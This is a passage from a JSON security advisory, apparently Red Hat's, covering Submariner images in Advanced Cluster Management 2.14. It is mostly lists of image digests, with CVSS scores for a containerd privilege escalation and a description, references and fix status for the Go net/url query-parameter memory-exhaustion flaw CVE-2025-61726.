"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:60c2e8e50cec20d1c78df0629256403d667ea47989aa3c30c696e76ce5e264e4_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:30dfcfaaf77a270fbcec02e53c013af5570a65334ef666cd77c9bef0a54d3418_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:5a97cf1a1723932e74bb1fc4fc410df0d78dd3035203cd7684bc3d6485d6f2e5_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:83a6d00f217f3e9000d6e6cba602d52b65922290dbb0dcdae8ee12b1c8b383c1_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:c52a0fb2364483a9c23763e76bfeae9923a9ae3d35e646012c528f7cc46bcdc1_ppc64le"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "LOCAL",
"availabilityImpact": "LOW",
"baseScore": 7.7,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:L",
"version": "3.1"
},
"products": [
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:0cbb0970c438efa6f7da80f8628b76550d8986d7f73b4f00e5c929d766472d7b_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:6aaeb062ada48648fd880cc1094180a2fa2b0bb3e9bbd9b0bcbe9a833c7f7208_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:bbe086814cc2fe9e53699ff23705479b493a62f9521b5f2664fcdb97dd5705a9_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:eac6affcb33fec57b7c3018346aa26759326b49264973b5c9a01d1a7c18285fc_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:84ea010ee8369be60c67bb28c831897583c5d23055c902c5e68be70729d80b73_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:e688af48ddf8d59c39e64b4c38e72fc2d6f06f28ab3732703d1c1664d91bdad7_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:e802f821ed0cc9f6f026a0385681e9e8b0daad39b6e7ea75e7c99f3df28e4e44_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:eee8da5b239e8a1cb5dc52e6ab514eebe159977afe842a0f7035732701a6f87a_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:5b036c08592fc679e4a158d58e2077929d07eb62825d94fd55afeedaa831d154_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:80e8f73158f4300a85f94c84a4e71fd6c0d4ce9553380c623f156b137497dc5c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:831c2d010a7f93da6c7f803c464171e3b14c2fe15779e3d2b0829f8d0f4e2285_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:f928393188edf404a004d4a692c8b633bd9c3ea4c8cabd5a9441c82d482c84a9_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:5455803b15f596679c80af65bc7e4d600d68bffcdfba6701444ff5da039f5bb2_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:5e1d6eea31cf8b7a3e5d1c94af072c81f1be1da47122938a2eeec7acd6e778c7_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:a154b2b05fe49a472506ed9f211693057361b9a58b0fa6477afb7abbba9e9e54_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:cac1a0a0a72004f64edb104385d2c0683a15401c8970777a2db2978b4fa32d33_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:157ec65b5967f65026b2e6c8d688fa734dbd8d2b056960b43d2ee9672979d120_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:2629fcf4d38774d9d4fa5bb72bb664982b32b8b8e1018a36d6bfd0b05a16a1c9_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:5118901bb1b8336f1a99f8757a32d61070fde1b4a26e40b7282aae81ae0b741d_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:7314924a015ddfc1dde55dd4991b9b3df8e8a279c3ce354d9d86ae66adfa46da_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:2d6f324a2f853471f3697da356db792ea9203939c4a12c02040c4cf62bbb9fb1_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:a7f2ac46b1edce62e4a8707e940a3813016b6a7c7ee11225700c792bc449ee33_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:be69bc672cabbced9e23829820685b30183bae1910a8af9fed5c1eff3a11aca3_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:ed6fa4602b7d1f175e8df0601be5b2c3e8ea9d906dc9cd2fd8a5ab76eea97175_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-operator-bundle@sha256:5b64e063acaeec1bae4ef902f3b482b47d85c0964e944e53663cff73f530a701_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:01a082229dbfbfee20345e1ccff5c8ac3ac3bd727a666d29221f465b43701133_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:100e10f6c2959526a2335d81d99c6887b16a29bd59e005e519140206d0ce73ed_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:2f772da0e95d6690c14966eaf7bb097a0c567a7077b93eb61d8bbcc552be4d1b_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:60c2e8e50cec20d1c78df0629256403d667ea47989aa3c30c696e76ce5e264e4_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:30dfcfaaf77a270fbcec02e53c013af5570a65334ef666cd77c9bef0a54d3418_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:5a97cf1a1723932e74bb1fc4fc410df0d78dd3035203cd7684bc3d6485d6f2e5_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:83a6d00f217f3e9000d6e6cba602d52b65922290dbb0dcdae8ee12b1c8b383c1_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:c52a0fb2364483a9c23763e76bfeae9923a9ae3d35e646012c528f7cc46bcdc1_ppc64le"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "github.com/containerd/containerd: containerd local privilege escalation"
},
{
"cve": "CVE-2025-61726",
"cwe": {
"id": "CWE-770",
"name": "Allocation of Resources Without Limits or Throttling"
},
"discovery_date": "2026-01-28T20:01:42.791305+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:5b036c08592fc679e4a158d58e2077929d07eb62825d94fd55afeedaa831d154_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:80e8f73158f4300a85f94c84a4e71fd6c0d4ce9553380c623f156b137497dc5c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:831c2d010a7f93da6c7f803c464171e3b14c2fe15779e3d2b0829f8d0f4e2285_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:f928393188edf404a004d4a692c8b633bd9c3ea4c8cabd5a9441c82d482c84a9_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-operator-bundle@sha256:5b64e063acaeec1bae4ef902f3b482b47d85c0964e944e53663cff73f530a701_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2434432"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the net/url package in the Go standard library. The package does not enforce a limit on the number of unique query parameters it parses. A Go application using the net/http.Request.ParseForm method will try to process all parameters provided in the request. A specially crafted HTTP request containing a massive number of query parameters will cause the application to consume an excessive amount of memory, eventually causing the application to crash or become unresponsive, resulting in a denial of service.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "golang: net/url: Memory exhaustion in query parameter parsing in net/url",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "To exploit this flaw, an attacker must be able to send a specially crafted HTTP request to an application parsing URL-encoded forms with net/url, specifically a request containing a large number of unique query parameters. The request will cause the application to consume an excessive amount of memory and eventually result in a denial of service, with no impact to confidentiality or integrity. Due to this reason, this vulnerability has been rated with an important severity.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:0cbb0970c438efa6f7da80f8628b76550d8986d7f73b4f00e5c929d766472d7b_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:6aaeb062ada48648fd880cc1094180a2fa2b0bb3e9bbd9b0bcbe9a833c7f7208_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:bbe086814cc2fe9e53699ff23705479b493a62f9521b5f2664fcdb97dd5705a9_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:eac6affcb33fec57b7c3018346aa26759326b49264973b5c9a01d1a7c18285fc_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:84ea010ee8369be60c67bb28c831897583c5d23055c902c5e68be70729d80b73_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:e688af48ddf8d59c39e64b4c38e72fc2d6f06f28ab3732703d1c1664d91bdad7_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:e802f821ed0cc9f6f026a0385681e9e8b0daad39b6e7ea75e7c99f3df28e4e44_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:eee8da5b239e8a1cb5dc52e6ab514eebe159977afe842a0f7035732701a6f87a_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:5455803b15f596679c80af65bc7e4d600d68bffcdfba6701444ff5da039f5bb2_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:5e1d6eea31cf8b7a3e5d1c94af072c81f1be1da47122938a2eeec7acd6e778c7_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:a154b2b05fe49a472506ed9f211693057361b9a58b0fa6477afb7abbba9e9e54_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:cac1a0a0a72004f64edb104385d2c0683a15401c8970777a2db2978b4fa32d33_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:157ec65b5967f65026b2e6c8d688fa734dbd8d2b056960b43d2ee9672979d120_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:2629fcf4d38774d9d4fa5bb72bb664982b32b8b8e1018a36d6bfd0b05a16a1c9_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:5118901bb1b8336f1a99f8757a32d61070fde1b4a26e40b7282aae81ae0b741d_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:7314924a015ddfc1dde55dd4991b9b3df8e8a279c3ce354d9d86ae66adfa46da_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:2d6f324a2f853471f3697da356db792ea9203939c4a12c02040c4cf62bbb9fb1_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:a7f2ac46b1edce62e4a8707e940a3813016b6a7c7ee11225700c792bc449ee33_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:be69bc672cabbced9e23829820685b30183bae1910a8af9fed5c1eff3a11aca3_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:ed6fa4602b7d1f175e8df0601be5b2c3e8ea9d906dc9cd2fd8a5ab76eea97175_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:01a082229dbfbfee20345e1ccff5c8ac3ac3bd727a666d29221f465b43701133_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:100e10f6c2959526a2335d81d99c6887b16a29bd59e005e519140206d0ce73ed_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:2f772da0e95d6690c14966eaf7bb097a0c567a7077b93eb61d8bbcc552be4d1b_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:60c2e8e50cec20d1c78df0629256403d667ea47989aa3c30c696e76ce5e264e4_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:30dfcfaaf77a270fbcec02e53c013af5570a65334ef666cd77c9bef0a54d3418_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:5a97cf1a1723932e74bb1fc4fc410df0d78dd3035203cd7684bc3d6485d6f2e5_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:83a6d00f217f3e9000d6e6cba602d52b65922290dbb0dcdae8ee12b1c8b383c1_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:c52a0fb2364483a9c23763e76bfeae9923a9ae3d35e646012c528f7cc46bcdc1_ppc64le"
],
"known_not_affected": [
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:5b036c08592fc679e4a158d58e2077929d07eb62825d94fd55afeedaa831d154_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:80e8f73158f4300a85f94c84a4e71fd6c0d4ce9553380c623f156b137497dc5c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:831c2d010a7f93da6c7f803c464171e3b14c2fe15779e3d2b0829f8d0f4e2285_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:f928393188edf404a004d4a692c8b633bd9c3ea4c8cabd5a9441c82d482c84a9_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-operator-bundle@sha256:5b64e063acaeec1bae4ef902f3b482b47d85c0964e944e53663cff73f530a701_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-61726"
},
{
"category": "external",
"summary": "RHBZ#2434432",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2434432"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-61726",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-61726"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-61726",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-61726"
},
{
"category": "external",
"summary": "https://go.dev/cl/736712",
"url": "https://go.dev/cl/736712"
},
{
"category": "external",
"summary": "https://go.dev/issue/77101",
"url": "https://go.dev/issue/77101"
},
{
"category": "external",
"summary": "https://groups.google.com/g/golang-announce/c/Vd2tYVM8eUc",
"url": "https://groups.google.com/g/golang-announce/c/Vd2tYVM8eUc"
},
{
"category": "external",
"summary": "https://pkg.go.dev/vuln/GO-2026-4341",
"url": "https://pkg.go.dev/vuln/GO-2026-4341"
}
],
"release_date": "2026-01-28T19:30:31.215000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-06-10T20:51:55+00:00",
"details": "For release note details, see the upstream Submariner release notes:\n\nhttps://submariner.io/community/releases/\n\nDownstream-specific issues resolved:\n* ACM-27238\n* ACM-28294\n* ACM-28295\n* ACM-28311\n* ACM-28313\n* ACM-28314\n* ACM-28315\n* ACM-28316\n* ACM-28329\n* ACM-28331\n* ACM-28333\n* ACM-28335\n* ACM-28337\n* ACM-28339\n* ACM-28342\n* ACM-29317\n* ACM-29511\n* ACM-29613\n* ACM-29614\n* ACM-29631\n* ACM-29632\n* ACM-29633\n* ACM-29634\n* ACM-29776\n* ACM-30134\n* ACM-30726\n* ACM-30727\n* ACM-30728\n* ACM-30729\n* ACM-30970\n* ACM-31136\n* ACM-31831\n* ACM-31840\n* ACM-32575\n* ACM-32842\n* ACM-34108\n* ACM-34586\n* ACM-34589\n\nFor more details, see the Red Hat Advanced Cluster Management for Kubernetes documentation:\n\nhttps://docs.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.14/",
"product_ids": [
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:0cbb0970c438efa6f7da80f8628b76550d8986d7f73b4f00e5c929d766472d7b_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:6aaeb062ada48648fd880cc1094180a2fa2b0bb3e9bbd9b0bcbe9a833c7f7208_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:bbe086814cc2fe9e53699ff23705479b493a62f9521b5f2664fcdb97dd5705a9_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:eac6affcb33fec57b7c3018346aa26759326b49264973b5c9a01d1a7c18285fc_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:84ea010ee8369be60c67bb28c831897583c5d23055c902c5e68be70729d80b73_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:e688af48ddf8d59c39e64b4c38e72fc2d6f06f28ab3732703d1c1664d91bdad7_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:e802f821ed0cc9f6f026a0385681e9e8b0daad39b6e7ea75e7c99f3df28e4e44_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:eee8da5b239e8a1cb5dc52e6ab514eebe159977afe842a0f7035732701a6f87a_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:5455803b15f596679c80af65bc7e4d600d68bffcdfba6701444ff5da039f5bb2_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:5e1d6eea31cf8b7a3e5d1c94af072c81f1be1da47122938a2eeec7acd6e778c7_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:a154b2b05fe49a472506ed9f211693057361b9a58b0fa6477afb7abbba9e9e54_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:cac1a0a0a72004f64edb104385d2c0683a15401c8970777a2db2978b4fa32d33_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:157ec65b5967f65026b2e6c8d688fa734dbd8d2b056960b43d2ee9672979d120_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:2629fcf4d38774d9d4fa5bb72bb664982b32b8b8e1018a36d6bfd0b05a16a1c9_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:5118901bb1b8336f1a99f8757a32d61070fde1b4a26e40b7282aae81ae0b741d_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:7314924a015ddfc1dde55dd4991b9b3df8e8a279c3ce354d9d86ae66adfa46da_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:2d6f324a2f853471f3697da356db792ea9203939c4a12c02040c4cf62bbb9fb1_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:a7f2ac46b1edce62e4a8707e940a3813016b6a7c7ee11225700c792bc449ee33_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:be69bc672cabbced9e23829820685b30183bae1910a8af9fed5c1eff3a11aca3_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:ed6fa4602b7d1f175e8df0601be5b2c3e8ea9d906dc9cd2fd8a5ab76eea97175_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:01a082229dbfbfee20345e1ccff5c8ac3ac3bd727a666d29221f465b43701133_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:100e10f6c2959526a2335d81d99c6887b16a29bd59e005e519140206d0ce73ed_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:2f772da0e95d6690c14966eaf7bb097a0c567a7077b93eb61d8bbcc552be4d1b_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:60c2e8e50cec20d1c78df0629256403d667ea47989aa3c30c696e76ce5e264e4_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:30dfcfaaf77a270fbcec02e53c013af5570a65334ef666cd77c9bef0a54d3418_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:5a97cf1a1723932e74bb1fc4fc410df0d78dd3035203cd7684bc3d6485d6f2e5_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:83a6d00f217f3e9000d6e6cba602d52b65922290dbb0dcdae8ee12b1c8b383c1_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:c52a0fb2364483a9c23763e76bfeae9923a9ae3d35e646012c528f7cc46bcdc1_ppc64le"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:25127"
},
{
"category": "workaround",
"details": "Red Hat has investigated whether a possible mitigation exists for this issue, and has not been able to identify a practical example. Please update the affected package as soon as possible.",
"product_ids": [
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:0cbb0970c438efa6f7da80f8628b76550d8986d7f73b4f00e5c929d766472d7b_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:6aaeb062ada48648fd880cc1094180a2fa2b0bb3e9bbd9b0bcbe9a833c7f7208_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:bbe086814cc2fe9e53699ff23705479b493a62f9521b5f2664fcdb97dd5705a9_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:eac6affcb33fec57b7c3018346aa26759326b49264973b5c9a01d1a7c18285fc_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:84ea010ee8369be60c67bb28c831897583c5d23055c902c5e68be70729d80b73_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:e688af48ddf8d59c39e64b4c38e72fc2d6f06f28ab3732703d1c1664d91bdad7_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:e802f821ed0cc9f6f026a0385681e9e8b0daad39b6e7ea75e7c99f3df28e4e44_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:eee8da5b239e8a1cb5dc52e6ab514eebe159977afe842a0f7035732701a6f87a_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:5b036c08592fc679e4a158d58e2077929d07eb62825d94fd55afeedaa831d154_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:80e8f73158f4300a85f94c84a4e71fd6c0d4ce9553380c623f156b137497dc5c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:831c2d010a7f93da6c7f803c464171e3b14c2fe15779e3d2b0829f8d0f4e2285_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:f928393188edf404a004d4a692c8b633bd9c3ea4c8cabd5a9441c82d482c84a9_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:5455803b15f596679c80af65bc7e4d600d68bffcdfba6701444ff5da039f5bb2_ppc64le",
